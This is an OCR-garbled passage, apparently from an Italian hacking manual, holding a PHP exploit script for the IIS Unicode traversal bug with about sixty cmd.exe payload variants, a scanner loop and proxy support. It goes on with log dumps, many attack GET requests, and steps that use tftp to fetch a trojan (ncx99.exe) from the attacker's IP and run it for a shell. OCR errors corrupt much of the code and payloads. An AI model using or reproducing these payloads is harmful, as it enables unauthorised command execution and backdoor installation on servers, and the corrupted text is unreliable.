$vector_ataque [10] = " /msadc/. . %25%35%63 . . / . .%25%35%63. ./. .%25%35%63. . /winnt/system32/cm 
d. exe?/c+" ; 

$vector__ataque [11 ] = "/MSADC/ . . %255c. . %255c. . %255c. . %255cwinnt/system32/cmd. exe?/c+"; 

$vector_ataque [12] = " /MSADC/ . . %%35c. . %%35c. . %%35c. . %%35cwinnt/system32/cmd. exe?/c+"; 

$vector_ataque [13]=" /MSADC/ . .%%35%63. .%%35%63. .%%35%63. . %%35%63winnt/system32/cmd. exe? 
/c+"; 

$vector_ataque [14] =" /MSADC/ . .%25%35%63. .%25%35%63. .%25%35%63. . %25%35%63winnt/system32/ 
cmd . exe ?/ c+ " ; 

$vector_ataque [15] = "/_vti_bin/ . . %255c. . %255c. . %255c. . %255c. . %255c. . /winnt/system32/cmd 
.exe ?/c+"; 

$vector_ataque [16] = "/_vti_bin/ . .%%35c. .%%35c. .%%35c. .%%35c. .%%35c. . /winnt/system32/cmd 
. exe ?/c+ " ; 

$vector_ataque[17] = "/_vt±_bin/. . %%35%63. . %%35%63. . %%35%63. . %%35%63. . %%35%63. ./winnt/sy 
st em32/cmd . exe ?/c+ " ; 

$vector_ataque [18] = " /_vti_bin/ . . %25%35%63. . %25%35%63. . %25%35%63. . %25%35%63. . %25%35%63. 
. /winnt/system32/cmd. exe ?/c+ " ; 

$vector_ataque [19] =" /PBServer/ . . %255c. . %255c. . %255cwinnt/system32/cmd. exe?/c+" ; 
$vector_ataque [20] =" /PBServer/ . .%%35c. .%%35c. . %%35cwinnt/system32/cmd. exe?/c+" ; 
$vector_ataque [21] =" /PBServer / . . %%35%63. . %%35%63. . %%35%63winnt/system32/cmd. exe?/c+" ; 
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$vector_ataque [22] =" /PBServer/ . . %25%35%63. . %25%35%63. . %25%35%63winnt/system32/cmd. exe? 
/c+"; 

$vector_ataque [23] ="/Rpc/ . . %255c. . %255c. . %255cwinnt/system32/cmd. exe?/c+" ; 

$vector__ataque [24] = "/Rpc/ . . %%35c. . %%35c. . %%35cwinnt/system32/cmd. exe?/c+" ; 

$vector_ataque [25] ="/Rpc/ . . %%35%63. . %%35%63. . %%35%63winnt/system32/cmd. exe?/c+" ; 

$vector_ataque [26] = "/Rpc/ . .%25%35%63. .%25%35%63. . %25%35%63winnt/system32/cmd. exe?/c+" ; 

$vector_ataque [27] = "/_vti_bin/ . . %255c. . %255c. . %255c. . %255c. . %255c. . /winnt/system32/cmd 
.exe ?/c+"; 

$vector_ataque [28] = "/_vti_bin/ . .%%35c. .%%35c. .%%35c. .%%35c. .%%35c. . /winnt/system32/cmd 
.exe ?/c+"; 

$vector_ataque [29] = "/_vti_bin/ . . %%35%63. . %%35%63. . %%35%63. . %%35%63. . %%35%63. ./winnt/sy 
st em32/cmd . exe ?/c+ " ; 

$vector_ataque [30] = •< /_vti_bin/ . . %2S%35%63. . %25%35%63. . %25%35%63. . %25%35%63. . %25%35%63. 
. /winnt/system32/cmd. exe ?/c+" ; 

$vector_ataque [31] =" /samples/ . . %255c. . %255c. . %255c. . %255c. . %255c. . %255cwinnt/system32/ 
cmd. exe?/c+ "; 

$vector_ataque [32] = "/cgi- 
bin/. . %255c. . %255c. . %255c. . %255c. . %255c. . %255cwinnt/system32/cmd. exe?/c+"; 

$vector_ataque [33] = "/iisadmpwd/ . . %252f. . %252f. . %252f. . %252f. . %252f. . %252fwinnt/system3 
2 /cmd. exe? /c+ "; 

$vector_ataque [34] = "/_vti_cnf/ . . %255c. . %255c. . %255c. . %255c. . %255c. . %255cwinnt/system32 
/cmd . exe ?/c+ " ; 

$vector_ataque [35] = " /adsamples/ . . %255c. . %255c. . %255c. . %255c. . %255c. . %255cwinrt/system3 
2/cmd.exe?/c+"; 

$vector__ataque [36] = "/scripts/ . .%C1%1C. .%C1%1C. .%C1%1C. . %Cl%lCwinnt/system32/cmd. exe?/c 

+ "; 

$vector_ataque [37] = "/scripts/ . . %C1%9C. . %C1%9C. . %C1%9C. . %Cl%9Cwinnt/system32/cmd. exe?/c 

+ "; 

$vector_ataque [38] =" /scripts/ . . %CO%AF. . %CO%AF. . %CO%AF. . %C0%AFwinnt/system32/cmd. exe?/c 
+ "! 

$vector_ataque [39] = " /scripts/ . . %252f . . %252f. . %252f. . %252fwinnt/system32/cmd.exe?/c+"; 

$vector_ataque [40] = " /scripts/ . . %255c. . %255cwirmt/system32/cmd. exe?/c+" ; 

$vectorataque [41 ]=" /scripts/ . . %cl%lc. . /winnt/system32/cmd . exe?/c+" ; 
$vectorataque [42] =" /scripts/ . . %c0%9v. . /winnt/system32/cmd . exe?/c+" ; 
$vector__ataque [43] = " /scripts/ . . %cO%af. . /«innt/system32/cmd. exe?/c+" ; 
$vector_ataque [44] =" /scripts/ . . %cO%qf. . /winnt/system32/cmd . exe?/c+" ; 
$vector_ataque [45] =" /scripts/ . . %cl%8s. . /winnt/system32/cmd. exe?/c+" ; 
$vector_ataque [46] = " /scripts/ . . %cl%9c. ./winnt/system32/cmd.exe?/c+" ; 
$vector_ataque [47] = " /scripts/ . . %cl%pc. . /winnt/system32/cmd. exe?/c+" ; 

$vector_ataque [48] = " /msadc/ . .%cO%af. ./. .%cO%af. ./. .%cO%af. . /winnt/sy stem32/ cmd. exe?/ c+ 



$vector_ataque [49] = "/_vti_bin/ . . %cO%af. ./. . %cO%af. ./. . %cO%af. . /winnt/system32/cmd. exe? 
/c+"; 

$vector_ataque [50] =" /scripts/ . . %cO%af. . /winnt/system32/cmd. exe?/c+" ; 
$vector_ataque [51 ]=" /scripts . . %cl%9c. . /winnt/system32/cmd. exe?/c+" ; 
$vector_ataque [52] =" /scripts/ . . %cl%pc. . /winnt/system32/cmd. exe?/c+" ; 
$vector__ataque [53] = " /scripts/ . . %c0%9v. . /winnt/system32/cmd. exe?/c+" ; 
$vectorataque [54] =" /scripts/ . . %cO%qf. . /winnt/system32/cmd. exe?/c+" ; 
$vector ataque [55] =" /scripts/ . . %cl%8s. . /winnt/system32/cmd. exe? / c+" ; 
$vector_ataque [56] =" /scripts/ . . %cl%lc. . /winnt/system32/cmd. exe?/c+" ; 
$vector_ataque [57] =" /scripts/ . . %cl%9c. . /winnt/system32/cmd. exe?/c+" ; 
$vector_ataque [58]=" /scripts/ . . %cl%af. . /winnt/sy stem32Zcmd.exe? /c+" ; 

$vector ataque [59] =" /scripts/ . . %e0%80%af . . /winnt/sy stem32Zcmd.exe? /c+" ; 

$vector_ataque [60] = " /scripts/ . . %f0%80%80%af . . /winnt/sy stem32Zcmd.exe? /c+" ; 
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$vector_ataque [61] ="/scripts/ . . %f8%80%80%80%af. . /winnt/system32/cmd. exe?/c+" ; 

$vector_ataque [62] = " /scripts/ . . %fc%80%80%80%80%af. . /winnt/system32/cmd. exe?/c+" ; 

$vector_ataque [63] =" /msadc/ . .\%e0\%80\%af. ./. ■ \%e0\%80\%af . ./■ ■ \%e0\%80\%af . ./winnt/sy 
st em32/cmd . exe \ ?/c+ " ; 

$vector_ataque [64] = "/cgi- 
bin/. . %cO%af. . %cO%af. . %cO%af. . %cO%af. . %cO%af. . /winnt/system32/cmd.exe?/c+" ; 

$vector_ataque [65] = " /samples/ . . %cO%af. . %cO%af. . %cO%af. . %cO%af. . %cO%af. . /winnt/system32 
/cmd . exe ?/c+ " ; 

$vector_ataque [66] = " /iisadmpwd/ . . %cO%af. . %cO%af. . %cO%af. . %cO%af. . %cO%af. . /winnt/ system 
32 /cmd . exe ?/c+ " ; 

$vector_ataque [ 67] = " /_vti_cnf/ . . %cO%af. . %cO%af. . %cO%af. . %cO%af. . %cO%af. ./winnt/system3 
2/cmd.exe?/c+"; 

$vector_ataque [ 68] = " /_vti_bin/ . . %cO%af. . %cO%af. . %cO%af. . %cO%af. . %cO%af. . /winnt/system3 
2/cmd.exe?/c+"; 

$vector_ataque [69] =" /adsamples/ . . %cO%af. . %cO%af. . %cO%af. . %cO%af. . %cO%af. . /winnt/system 
32 /cmd . exe ?/c+ "; 

if(!±sset ($argv[l])) 

{ 

echo "\n\n 



\n" 

-Vi"; 

— \n\n"; 



variant_number\n ", 
the good one) \n "; 



echo " (c) UNICODE exploit for US 5.0/4.0 by BoloTron 

echo " 

echo "Usage of the wicked device :\n"; 

echo $argv[0]." -t www. victim. vic\n" ; 

echo $argv[0] . " -t www.victim.vic -p proxy : port\n" ; 

echo $argv[0]." www.victim.vic comand variant_number\n" ; 

echo $argv[0] . " -p proxy :port www.victim.vic comand 

echo "Options : \n " ; 

echo "—t — > Test the vulnerability (Try known variants till find 



echo "-p — > Attack through proxy\n" ; 

echo "\nUse Mode : \nl) Test the host and get the variants number in 
case vulnerability exists\n"; 

echo "2) Attack with command and variants number (optionaly you can 

use proxy) \n " ; 

echo "Note : When you specify a command with spaces, replace spaces 
with low script \"_\" \n" ; 

echo "and you must doublé the backslash \"\\\". \n 
Example" . $argv[0] . " —p proxy. prx: 3128 www.victima.com dir_c : \ \ \ \inetpub 49\n" ; 

echo "Thanks to An-tonio for the proxy support.\n"; 

echo "Bug discover by Anonymous Post .\n" ; 

echo "TYPE ".$argv[0]." spanish, for Spanish help.\n"; 



} 

else 
{ 



if ($argv[l ] == "spanish ") 
{ 

echo "\n\n 



\ n „. 

\n"; 

\n\n"; 



echo " (c) Exploit UNICODE para US 5.0/4.0 por BoloTron 

echo " 

echo "Uso del artefacto maligno :\n" ; 



echo $argv[0] . " —t www. victima . vic\n" ; 

echo $argv[0]." —t www.victima.vic —p proxy :puerto\n" ; 

echo $argv[0]." www.victima.vic comando n° de variante\n"; 

echo $argv[0]." —p proxy :port www.victima.vic comand 
n°_de variante\n " ; 

echo "Opciones : \n " ; 

echo "— t — > Testea la vulnerabilidad, prueba todas las variantes 
hasta encontrar una buena.\n"; 

echo "—p — > Ataque a traves de proxy\n" ; 

echo "\nModo de Empleo:\nl) Testear el host y anotar el numero de 
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echo "2) Atacar especificando comando y n° de variante (opcionalmente 
puedes especificar un proxy)\n" ; 

echo "Nota : Cuando se especifica un comando en el que hay espacios 
hay que sustituirlos por un guion bajo _ \n"; 

echo "y las contrabarras hay que ponerlas dobles . \nEjemplo : 
". $argv[0] . " -p proxy.prx: 3128 www.victima.com dir_c : \ \ \ \inetpub 49\n" ; 

echo "Gracias a An-tonio por sus indicaciones en el soporte 

proxy. \n"; 

echo "Bug descubierto por aviso anonimo. \n"; 

exit; 

} 

if($argv[l]=="-t ") 
{ 

if ($argv[3]=="-p") 
{ 

for ($i=0; $i<70; $i++) 
{ 

$prox=explode ( " : ", $argv[ 4] ) ; 
$comando="dir+c : \ \ "; 

$fp = fsockopen($prox[0] , $prox[l]); 

if(!$fp) 

{ 

echo "Conection failed. . .\n"; 

ì 

else 
{ 

fputs ($fp, "GET 

http : // " . $argv[2 ]."•'. $vector_ataque [$i ] . " " . $comando . " ; HTTP/1 . 0\n\n" ) ; 

echo "Trying variant number ".$i." "; 
while(!feof($fp)) 

$resul=$resul . fgets ($fp, 128); 

i f (ereg ( " <DIR> " , $resul ) ) 

echo " > Vulnerable! !\n"; 

exit; 

else 

echo " > NoT Vulnerable : (\n"; 



} 

foiose ($fp) ; 

} 
} 

else 
{ 

for ($i=0; $i<70; $i++) 
{ 

$port=80; 
$comando="dir+c : \ \ "; 
$fp = fsockopen ($argv[2] , $port) ; 
if(!$fp) 
{ 

echo "Conection failed. . .\n" ; 

} 

else 
{ 

fputs ($fp, "GET " . $vector_ataque [$i ] $comando . " 

echo "Trying variant number ".$i." "; 
while ( ! feof ($fp) ) 
{ 

$resul=$resul . fgets ($fp, 128) ; 

} 

i f (ereg ( " <DIR> " , $resul ) ) 
{ 

echo " > vulnerable !! \n" ; 

exit; 

} 

else 
{ 

echo " > No Vulnerable 



HTTP/1. 0\n\n") ; 



: (\n"; 
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; 

foiose ($fp) ; 

} 

} 

} 

else 
{ 

if($argv[l]=="-p") 
{ 

$prox=explode ( " : ", $argv[2] ) ; 

$port =$prox [1 ] ; 
$comando=ereg_replace ( "_ ", "+ ", $argv[ 4] ) ; 
$fp = fsockopen ($prox [0] , $port) ; 

±f(!$fp) 
{ 

echo "Conection failed.\n"; 

} 

else 
{ 

fputs ($fp, "GET 

http : // " . $argv[3 ]."". $vector__ataque [$argv[5 ]]."". $comando . " ; HTTP/1 . 0\n \n ") ; 

while(!feof($fp)) 
{ 

echo fgets ($fp, 128) ; 

} 

} 

foiose ($fp) ; 

} 

else 
{ 

$port=80; 

$comando=ereg__replace ( "_ ", "+ ", $argv[ 2] ) ; 
$fp = fsockopen ($argv[l] , $port) ; 
lf(!$fp) 
{ 

echo "Conection failed.\n"; 

} 

else 
{ 

fputs ($fp, "GET 
" . $vector_ataque [ $argv[3 ] ] . "". $comando . " HTTP/1 . 0\n \n ") ; 

while(!feof($fp)) 
{ 

echo fgets <$fp, 128) ; 

} 

} 

fclose ($fp) ; 

} 

} 




(129) Alcune variazioni legate all'UNICODE BUG possono essere visualizzate neidump che 
seguono : 

(130) GET 



Se questo funziona potrete vedere : 
Directory of c:\ 



11/26/00 12:34p 

11/26/00 06:57p 

11/26/00 12:34p 

12/07/00 03:30p 

12/07/00 03:12p 



<DIR> 



0 AUTOEXEC.BAT 
322 boot . ini 
0 CONFIG.SYS 
InetPub 
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(131) 12/20/00 05:13p 78 , 643 , 200 pagefile . sys 

12/21/00 08:59p <DIR> Program Files 

12/21/00 08:59p <DIR> TEMP 

12/20/00 05:14p <DIR> WINNT 



é possibile anche provare direttamente da BROWSER imbastire comandi del tipo : 

http: //address . of. iis5 . system/scripts/ . . %cl%lc. . /wlnnt/system32/cmd. exe?/c+dir+c :\ 

Il fatto di riuscire a vedere come MS interpreta i caratteri è possibile farlo andando a vedere il 
file di LOG. 

Un esempio potrebbe essere: 

11:21:01 212.36.0.230 - 172.17.1.4 GET 

/msadc/. .%c0%af. ./. .%cO%af. ./. .%cO%af. ./. .%cO%af. . /winnt/system32/cmd. exe?/c 
+"dir%20c:\" 200 80 Mozilla/4 . 0+ (compatible; +MSIE+5 . 5; +Wlndows+NT+5 . 0) - 
11:21:15 212.36.0.230 - 172.17.1.4 GET 

/msadc/. .%c0%af. ./. .%cO%af. ./. .%cO%af. ./. .%cO%af. ./winnt/system32/cmd.exe?/c 
+"dir%20c:\winnt\system32\logfiles\" 200 80 
Mozilla/ 4 . 0+ (compatible; +MSIE+5 . 5; +Windows+NT+5 .0) - 
11:21:24 212.36.0.230 - 172.17.1.4 GET 

/msadc/. .%cO%af. ./. .%c0%af. ./. .%cO%af. ./. .%cO%af. . /winnt/system32/cmd. exe?/c 
+ n dir%20c:\winnt\system32\logfiles\W3SVCl\" 200 80 
Mozilla/4 . 0+ (compatible; +MSIE+5 . 5; +Windows+NT+5 .0) - 
11:21:42 212.36.0.230 - 172.17.1.4 GET 

/msadc/. .%c0%af. ./. .%c0%af. ./. .%cO%af. ./. .%cO%af. . /winnt/system32/cmd.exe?/c 
+"type%20c: \winnt\system32\logfiles\W3SVCl\ex001210.log" 502 80 
Mozilla/4 . 0+ (compatible; +MSIE+5 . 5; +Windows+NT+5 .0) - 

(132) Usando la classe che incapsula le funzioni WINSOCK potremmo scrivere un altro 
programma simile a quello scritto prima in PHP che prova a creare un messaggio di testo sul 
sistema remoto usando le seguenti stringhe di prova. 

GET /msadc/ . . %255c. ./. . %255c. ./. . %255c. . /winnt/system32/cmd. exe? 
/c+echo+test+message+>+test .msg\nHTTP/l . 0\n\n 

GET /msadc/. . %25%35%63. ./. . %25%35%63. ./. . %25%35%63. . /winnt/system32/cmd. exe? 
/c+echo+test+message+>+test .msg\nHTTP/l . 0\ti\ti 

GET /msadc/. . %255c. . %255c. . %255c. . %255cwinnt/system32/cmd.exe? 
/c+echo+test+message+>+test .msg\nHTTP/l . 0\ti\ti 

GET /msadc/. . %25%35%63. . %25%35%63. . %25%35%63. . %25%35%63winnt/system32/cmd. exe? 
/c+echo+test+message+>+test .msg\nHTTP/l . 0\ti\ti 
GET /scripts/ . . %255c. . %255cwinnt/system32/cmd.exe? 
/c+echo+test+message+>+test .msg\nHTTP/l . 0\ti\ti 

GET /scripts/ . . %252f. . %252f. . %252f. . %252fwinnt/system32/cmd. exe? 
/c+echo+test+message+>+test .msg\nHTTP/l . 0\ti\ti 
GET /scripts/ . . %255c. . %255cwinnt/system32/cmd.exe? 
/c+echo+test+message+>+test .msg\nHTTP/l . 0\ti\ti 

GET /msadc/ . . %255c. ./. . %255c. ./. . %255c. . /winnt/system32/cmd. exe? 
/c+echo+test+message+>+test .msg\nHTTP/l . 0\ti\ti 

GET /msadc/. . %%35c. ./. . %%35c. ./. . %%35c. . /winnt/system32/cmd. exe? 
/c+echo+test+message+>+test .msg\nHTTP/l . 0\ti\ti 

GET /msadc/. .%%35%63. ./. .%%35%63. ./. .%%35%63. . /winnt/system32/cmd.exe? 
/ c+echo+test+message+>+test . msg\nHTTP /l . 0\ti\ti 

GET /msadc/. . %25%35%63. ./. . %25%35%63. ./. . %25%35%63. . /winnt/system32/cmd. exe? 
/c+echo+test+message+>+test .msg\nHTTP/l . 0\ti\ti 

GET /MSADC/. . %255c. . %255c. . %255c. . %255cwinnt/system32/cmd. exe? 
/c+echo+test+message+>+test .msg\nHTTP/l . 0\ti\ti 

GET /MSADC/. . %%35c. . %%35c. . %%35c. . %%35cwinnt/system32/cmd. exe? 
/c+echo+test+message+>+test .msg\nHTTP/l . 0\ti\ti 

GET /MSADC/. . %%35%63. . %%35%63. . %%35%63. . %%35%63winnt/system32/cmd. exe? 
/c+echo+test+message+>+test .msg\nHTTP/l . 0\ti\ti 

GET /MSADC/. . %25%35%63. . %25%35%63. . %25%35%63. . %25%35%63winnt/system32/cmd. exe? 
/c+echo+test+message+>+test .msg\nHTTP/l . 0\ti\ti 

GET /_vti_bin/ . . %255c. . %255c. . %255c. . %255c. . %255c. . /winnt/system32/cmd. exe? 
/c+echo+test+message+>+test .msg\nHTTP/l . 0\ti\ti 

GET /_vti_bin/. . %%35c. . %%35c. . %%35c. . %%35c. . %%35c. . /winnt/system32/cmd. exe? 
/c+echo+test+message+>+test .msg\nHTTP/l . 0\ti\ti 

GET /_vti_bin/. . %%35%63. . %%35%63. . %%35%63. . %%35%63. . %%35%63. . /winnt/ system32Zcmd.exe ? 
/ c+echo+test+message+>+test . msg\nHTTP /l . 0\ti\ti 

GET /_vti_bin/ . . %25%35%63. . %25%35%63. . %25%35%63. . %25%35%63. . %25%35%63. . 
/winnt / system32 / cmd . exe? / c+echo+test+message+>+test .msg\nHTTP/l . 0\ti\ti 
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GET /PBServer/ . . %255c. . %255c. . %255cwinnt/system32/cmd.exe? 
/c+echo+test+message+>+test .msg\nHTTP/l . 0\ti\ti 
GET /PBServer/ . . %%35c. . %%35c. . %%35cwinnt/system32/cmd.exe? 
/c+echo+test+message+>+test .msg\nHTTP/l . 0\n\n 

GET /PBServer/. . %%35%63. . %%35%63. . %%35%63winnt/system32/cmd.exe? 
/c+echo+test+message+>+test . msg\nHTTP / 1 . 0\ti\ti 

GET /PBServer/. . %25%35%63. . %25%35%63. . %25%35%63wlnnt/system32/cmd. exe? 

/c+echo+test+message+>+test . msg\nHTTP / 1 . 0\n\n 

GET /Rpc/. . %255c. . %255c. . %255cwinnt/system32/cmd.exe? 

/c+echo+test+message+>+test . msg\nHTTP / 1 . 0\n\n 

GET /Rpc/. . %%35c. . %%35c. . %%35cwinnt/system32/cmd.exe? 

/c+echo+test+message+>+test .msg\nHTTP/l . 0\n\n 

GET /Rpc/. .%%35%63. .%%35%63. . %%35%63winnt/system32/cmd. exe? 

/c+echo+test+message+>+test .msg\nHTTP/l . 0\n\n 

GET /Rpc/. . %25%35%63. . %25%35%63 . . %25%35%63winnt/system32/cmd. exe? 
/c+echo+test+message+>+test .msg\nHTTP/l ,0\n\n 

GET /_vti_bin/ . . %255c. . %255c. . %255c. . %255c. . %255c. . /winnt/system32/cmd. exe? 
/c+echo+test+message+>+test .msg\nHTTP/l . 0\n\n 

GET /_vti_bin/ . . %%35c. . %%35c. . %%35c. . %%35c. . %%35c. . /winnt/system32/cmd. exe? 
/c+echo+test+message+>+test .msg\nHTTP/l . 0\ti\ti 

GET /_vti_b±n/ . . %%35%63. . %%35%63. . %%35%63. . %%35%63 . . %%35%63. . /winnt/system32/cmd . exe? 
/c+echo+test+message+>+test . msg\nHTTP / 1 . 0\ti\ti 

GET /_vti_bin/. . %25%35%63. . %25%35%63. . %25%35%63. . %25%35%63. . %25%35%63. . 
/w±nnt/system32/cmd. exe?/c+echo+test+message+>+test .mag\nHTTP/l . 0\ti\ti 
GET /samples/ . . %255c. . %255c. . %255c. . %255c. . %255c. . %255cwinnt/system32/cmd. exe? 
/c+echo+test+message+>+test .msg\nHTTP/l . 0\n\n 

GET /cgi-bin/ . . %255c. . %255c. . %255c. . %255c. . %255c. . %255cwinnt/system32/cmd. exe? 
/c+echo+test+message+>+test . msg\nHTTP / 1 . 0\ti\ti 

GET /llsadmpwd/ . . %252f. . %252f. . %252f. . %252f. . %252f. . %252fwinnt 
/system32/cmd. exe? /c+echo+test+message+>+test . msg\nHTTP / 1 . 0\n\n 

GET /_vti_cnf/ . . %255c. . %255c. . %255c. . %255c. . %255c. . %255cwinnt/system32/cmd. exe? 
/c+echo+test+message+>+test .msg\nHTTP/l . 0\ti\ti 

GET /adsamples/ . . %255c. . %255c. . %255c. . %255c. . %255c. . %255cwinnt/system32/cmd. exe? 
/c+echo+test+message+>+test .msg\nHTTP/l . 0\ti\ti 

GET /scripts/ . . %C1%1C. . %C1%1C. . %C1%1C. . %Cl%lCwinnt/system32/cmd. exe? 
/c+echo+test+message+>+test .msg\nHTTP/l . 0\ti\ti 

GET /scripts/ . . %C1%9C. . %C1%9C. . %C1%9C. . %Cl%9Cwinnt/system32/cmd.exe? 
/c+/c+echo+test+message+>+test .msg\nHTTP/l . 0\ti\ti 

GET /scripts/ . . %CO%AF. . %CO%AF. . %C0%AF. . %C0%AFwinnt/system32/cmd. exe? 
/c+/c+echo+test+message+>+test .msg\nHTTP/l . 0\ti\ti 

GET /scripts/. . %252f . . %252f. . %252f. . %252fwinnt/system32/cmd. exe? 

/c+/c+echo+test+message+>+test ,msg\nHTTP/l . 0\ti\ti 

GET /scripts/ . . %255c. . %255cwinnt/system32/cmd. exe? 

/c+echo+test+message+>+test .msg\nHTTP/l . 0\n\n 

GET /scripts/ . .%cl%lc. . /winnt/system32/cmd.exe? 

/c+echo+test+message+>+test .msg\nHTTP/l . 0\ti\ti 

GET /scripts/ . ,%c0%9v. . /winnt/system32/cmd.exe? 

/c+echo+test+message+>+test .msg\nHTTP/l . 0\ti\ti 

GET /scripts/ . .%cO%af. . /winnt/system32/cmd. exe? 

/ c+echo+test+message+>+test . msg\nHTTP /l . 0\ti\ti 

GET /scripts/ . .%cO%qf. . /winnt/system32/cmd. exe? 

/c+echo+test+message+>+test .msg\nHTTP/l . 0\ti\ti 

GET /scripts/ . .%cl%8s. . /winnt/system32/cmd. exe? 

/c+echo+test+message+>+test .msg\nHTTP/l . 0\ti\ti 

GET /scripts/ . .%cl%9c. . /winnt/system32/cmd. exe? 

/ 'c+echo+test+message+>+test . msg\nHTTP /l . 0\ti\ti 

GET /scripts/ . .%cl%pc. . /winnt/system32/cmd. exe? 

/ 'c+echo+test+message+>+test . msg\nHTTP /l . 0\ti\ti 

GET /msadc/. . %cO%af. ./. . %cO%af. ./. . %cO%af. . /winnt/system32/cmd. exe? 
/c+echo+test+message+>+test .msg\nHTTP/l . 0\ti\ti 

GET /__yti_bin/ . . %cO%af. . /. . %cO%af. . /. . %cO%af. . /winnt/system32/cmd. ex? 
/c+echo+test+message+>+test .msg\nHTTP/l . 0\ti\ti 
GET /scripts/ . .%cO%af. . /winnt/system32/cmd. exe? 
/c+echo+test+message+>+test .msg\nHTTP/l . 0\ti\ti 
GET /scripts. .%cl%9c. . /winnt/system32/cmd. exe? 
/c+echo+test+message+>+test .msg\nHTTP/l . 0\ti\ti 
GET /scripts/ . .%cl%pc. . /winnt/system32/cmd. exe? 
/c+echo+test+message+>+test .msg\nHTTP/l . 0\ti\ti 
GET /scripts/ . .%c0%9v. . /winnt/system32/cmd. exe? 
/c+echo+test+message+>+test .msg\nHTTP/l . 0\ti\ti 
GET /scripts/ . .%cO%qf. . /winnt/system32/cmd. exe? 
/c+echo+test+message+>+test .msg\nHTTP/l . 0\ti\ti 
GET /scripts/ . .%cl%8s. . /winnt/system32/cmd. exe? 
/ c+echo+test+message+>+test . msg\nHTTP /l . 0\ti\ti 
GET /scripts/ . .%cl%lc. . /winnt/system32/cmd. exe? 
/c+echo+test+message+>+test .msg\nHTTP/l . 0\n\n 
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/c+echo+test+message+>+test . msg\nHTTP/l . 0\n\n 

GET /scripts/ , .%cl%af. . /winnt/system32/cmd.exe? 

/c+echo+test+message+>+test .msg\nHTTP/l . 0\n\n 

GET /scripts/ . . %e0%80%af. . /winnt/system32/cmd.exe? 

/c+echo+test+message+>+test .msg\nHTTP/l . 0\ti\ti 

GET /scripts/ . . %f0%80%80%af . . /winnt/system32/cmd. exe? 

/c+echo+test+message+>+test .msg\nHTTP/l . 0\ti\ti 

GET /scripts/ . . %f8%80%80%80%af . . /winnt/system32/cmd.exe? 

/c+echo+test+message+>+test .msg\nHTTP/l . 0\n\n 

GET /scripts/ . .%fc%80%80%80%80%af. . /winnt/system32/cmd.exe? 

/c+echo+test+message+>+test .msg\nHTTP/l . 0\n\n 

GET /msadc/. . \%e0\%80\%af . ./• • \%e0\%80\%af . ./. . \%e0\%80\%af . . /winnt 
/system32/cmd. exe\ ?/c+echo+test+message+>+test .msg\nHTTP/l . 0\n\n 

GET /cgi-bin/ . . %cO%af. . %cO%af. . %cO%af. . icOiaf. . %cO%af. . /winnt/system32/cmd. exe? 
/c+echo+test+message+>+test .msg\nHTTP/l . 0\ti\ti 

GET /samples/ . . %cO%af. . %cO%af. . %cO%af. . %cO%af. . %cO%af. . /winnt/system32/cmd. exe? 
/c+echo+test+message+>+test .msg\nHTTP/l . 0\n\n 

GET /iisadmpwd/ . . %cO%af. . %cO%af. . %cO%af. . %cO%af. . %cO%af. . /winnt/system32/cmd. exe? 
/c+echo+test+message+>+test .msg\nHTTP/l . 0\n\n 

GET /_vti_cnf/ . . %cO%af. . %cO%af. . %cO%af. . %cO%af. . %cO%af. . /winnt/system32/cmd. exe? 
/c+echo+test+message+>+test .msg\nHTTP/l . 0\ti\ti 

GET /_vti_bin/ , . %cO%af. . %cO%af. . %cO%af. . %cO%af. . %cO%af. . /winnt/system32/cmd. exe? 
/c+echo+test+message+>+test.msg\nHTTP/l . 0\ti\ti 

GET /adsamples/..%cO%af..%cO%af..%cO%af..%cO%af..%cO%af../winnt/system32/cmd.exe? 
/c + echo + test + message + > + test.msg\nHTTP/1 .0\n\n 

In ogni caso in relazione all' UNICODE BUGS esiste una definizione di stringa standard 
definita su http://www.securityfocus.com e precisamente : 



http://target/scripts/..%c1 %1 c../path/file.ext 

Ricordiamoci sempre che le configurazioni dei sistemi potrebbero essere differenti per cui 
spesso è necessario provare diverse soluzioni prima di individuare quella giusta. 
Usando la definizione standard di prima sono esempi che richiedono la directory su un 
sistema : 



http://target/scripts/..%c1 %1 c../winnt/syst em32/cmd.exe?/c+dir 

http://target/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir 

http ://target/scripts/..%c0%af../winnt/system32/cmd. exe ?/c+dir 

http://target/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir 

http://target/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir 

http://target/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir 

cmd.exe?/c + dir 



Nel caso dell'UNICODE BUGS il fatto di riportare più esempi può essere particolarmente utile 
a chi non dispone ancora di una certa esperienza per cui l'uso di questo metodo lo 
porterebbe ad usare solo gli esempi riportati. 

Precedentemente abbiamo detto che grazie a tftp potevamo installare un ROOTKIT sul 

sistema remoto al fine di riuscire ad aprire una shell. 

In ogni caso potremmo installare qualsiasi trojan trovabile sulla rete. 

Negli esempi di prima abbiamo visto direttamente il modo di formulare il comando TFTP 
senza vederlo come questo sarebbe stato possibile lanciarlo da prompt di comando. 
Il comando per il trasferimento di un trojan potrebbe essere : 

tftp.exe -i xxx.xxx.xxx.xxx GET ncx99.exe 

dove chiaramente xxx.xxx.xxx.xxx è l'IP con cui ci si vuole connettere dal sistema remoto 
ovvero ilo nostro. 

Abbiamo detto che la difficoltà di utilizzo di questo bugs sta nel fatto di riuscire ad individuare 
qual è il percorso della directory BIN relativa al settaggio del nostro sistema. 
Negli esempi di prima abbiamo dato per scontato che questa fosse appunto SCRIPTS. 
Volendo generalizzare il comando potremmo riportarlo con : 
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GET /[bin-dir]/..%c0%af../winnt/system32/tftp.exe+"- 
i"+xxx.xxx.xxx.xxx+GET+ncx99.exe+c:\winnt\system32\ncx99.exe 

Tramite TELNET oppure 

http:://sito/[bin-dir]/..%c0%af../winnt/system32/tftp.exe+"- 
i"+xxx.xxx.xxx.xxx+GET+ncx99.exe+c:\winnt\system32\ncx99.exe 

Una volta trasferito il trojan potremmo mandarlo in esecuzione con il comando : 

GET/[bin-dirl/..%cO%af.. 



Sempre come TELNET oppure come http da browser : 
http://sito/[bin-dir]/..%c0%af../winnt/system32/ncx99 



I comandi che possono essere specificati potrebbero avere finalità differenti come ad 
esempio quelli che seguono. 

1 ) Copiare da ".. \..\winnt\system32\cmd.exe " a "..\..\interpub\scripts\cmd1 .exe" 



http: //site/ scripts/ . .%cl%9c. . /winnt/system32/cmd.exe?/c+copy+. . \ . . \w 
innt \system32\cmd. exe+cmdl . exe 

MS restituisce : 

"CGI Error 

The specified CGI application misbehaved by not returning a complete 

set of HTTP headers. 

The headers it did return are: 



1 file(s) copied. " 

